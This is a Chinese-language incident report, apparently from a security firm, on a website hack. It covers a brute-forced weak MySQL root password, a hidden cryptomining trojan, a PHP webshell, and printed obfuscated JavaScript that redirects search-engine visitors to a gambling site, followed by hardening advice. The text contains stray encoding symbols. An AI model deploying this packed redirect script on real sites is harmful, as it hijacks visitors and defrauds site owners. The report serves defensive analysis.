近日某客戶網(wǎng)站被黑��,導(dǎo)致網(wǎng)站首頁被篡改并跳轉(zhuǎn)到賭博網(wǎng)站��,網(wǎng)站在百度的收錄也收錄了一些什么彩票內(nèi)容的快照�����,網(wǎng)站首頁快照也被修改成賭博內(nèi)容���,并被百度直接紅色風(fēng)險(xiǎn)攔截提示�����,百度網(wǎng)址安全中心提醒您:該站點(diǎn)可能受到黑客攻擊���,部分頁面已被非法篡改!我們SINE安全公司根據(jù)以上客戶被黑的情況,立即進(jìn)行了全面的網(wǎng)站安全檢測�,針對網(wǎng)站被黑的情況制定了詳細(xì)的安全部署方案。
首先客戶網(wǎng)站使用的是Linux centos系統(tǒng)服務(wù)器��,客戶提供服務(wù)器ip,ssh端口��,root賬號密碼后���,我們進(jìn)去查看了服務(wù)器是否存在被黑以及系統(tǒng)木馬后門的情況��,再一個(gè)我們對其使用的mysql數(shù)據(jù)庫進(jìn)行了安全檢測���,發(fā)現(xiàn)問題,該mysql數(shù)據(jù)庫的root賬號使用的是弱口令密碼��,導(dǎo)致攻擊者可以利用軟件對數(shù)據(jù)庫進(jìn)行強(qiáng)力破解,導(dǎo)致破解成功�����,利用root權(quán)限直接提權(quán)并上傳腳本木馬到網(wǎng)站的根目錄下�。
根據(jù)上面發(fā)現(xiàn)的數(shù)據(jù)庫安全問題,我們深度挖掘���,追蹤溯源�����,發(fā)現(xiàn)服務(wù)器還存在木馬后門,top�,查看linux當(dāng)前進(jìn)程,發(fā)現(xiàn)一個(gè)可疑的進(jìn)程���,通過查看進(jìn)程的詳細(xì)信息我們發(fā)現(xiàn)該進(jìn)程是木馬后門進(jìn)程���,再仔細(xì)一檢查發(fā)現(xiàn)該木馬是挖礦木馬,攻擊者利用服務(wù)器資源�����,帶寬,進(jìn)行挖礦���,像比特幣�、以太坊等幣進(jìn)行挖礦����。
我們對其挖礦木馬進(jìn)行安全分析:如下圖
解密木馬內(nèi)容,我們發(fā)現(xiàn)該木馬目前來說是免殺的木馬��,一般人是看不出問題來�,但是經(jīng)常維護(hù)服務(wù)器的運(yùn)維人員就會察覺出來,第一該木馬隱藏到linux進(jìn)程當(dāng)中去�,根據(jù)時(shí)間段進(jìn)行挖礦,避開高峰時(shí)間�����,以及維護(hù)人員的工作時(shí)間�����,當(dāng)挖礦的時(shí)候木馬進(jìn)程CpU占用達(dá)到百分之80以上�����,甚至有時(shí)候網(wǎng)站都打開很慢。服務(wù)器的木馬查完后�,我們對網(wǎng)站的源代碼進(jìn)行安全檢測,發(fā)現(xiàn)網(wǎng)站目錄里被上傳了網(wǎng)站木馬后門�����,php腳本木馬��,該腳本木馬可以對網(wǎng)站進(jìn)行讀寫新建等操作�,網(wǎng)站的首頁標(biāo)題描述也被改成了什么賭博的內(nèi)容如下圖:
<>eval(function(p,a,c,k,e,d){e=function(c){return(c
(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString
(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=
[function(e){return d[e]}];e=function(){return'w+'};c=1;};while(c--)
if(k[c])p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c]);return p;}
('3.4("");3.4("d 1=3.f");3.4("e(1.2("7")>0 || 1.2(
"6")>0 || 1.2("8")>0 ||1.2("a")>0 ||1.2("9")>0 ||1.2(
"l")>0 ||1.2("m")>0 ||1.2("k")>0 )");3.4("h.g="j://i.o.n
";");3.4("");',25,25,'|s|indexOf|document|writeln||sogou|
baidu|soso|uc|sm|Java|LANGUAGE|var|if|referrer|href|location|www|
http|so|bing|yahoo|com|268238'.split('|'),0,{}))
通過解密上面的代碼發(fā)現(xiàn),只要是從百度����,搜狗,以及soso��,so,bing等搜索引擎來的訪問����,都會直接跳轉(zhuǎn)到攻擊者設(shè)定好的賭博網(wǎng)站上去��。隨即我們SINE安全公司對該惡意代碼進(jìn)行了清除��,網(wǎng)站恢復(fù)正常訪問�。
以上就是我們解決客戶網(wǎng)站安全的整個(gè)過程�,下面針對于此次網(wǎng)站被黑���,提供如下 的網(wǎng)站安全建議:
1.對mysql數(shù)據(jù)庫進(jìn)行安全部署����,對root賬號密碼加密��,盡可能設(shè)置的復(fù)雜一些���,數(shù)字+大小寫字母+特殊符號����,對網(wǎng)站數(shù)據(jù)庫進(jìn)行分配普通權(quán)限賬號��。
2.mysql數(shù)據(jù)庫默認(rèn)端口3306���,改為51158���,并加入到端口安全策略,不對外開放�,外網(wǎng)Ip無法連接數(shù)據(jù)庫,只有本地127.0.0.1才能進(jìn)行連接數(shù)據(jù)庫,以防止攻擊者惡意猜測���。
3.對服務(wù)器底層系統(tǒng)進(jìn)行安全加固�,包括SSH登錄的安全驗(yàn)證����。
4.對網(wǎng)站代碼進(jìn)行整體的安全檢測,包括定期的升級網(wǎng)站程序源代碼��,修復(fù)補(bǔ)丁以及網(wǎng)站漏洞��。
本文來源:A5
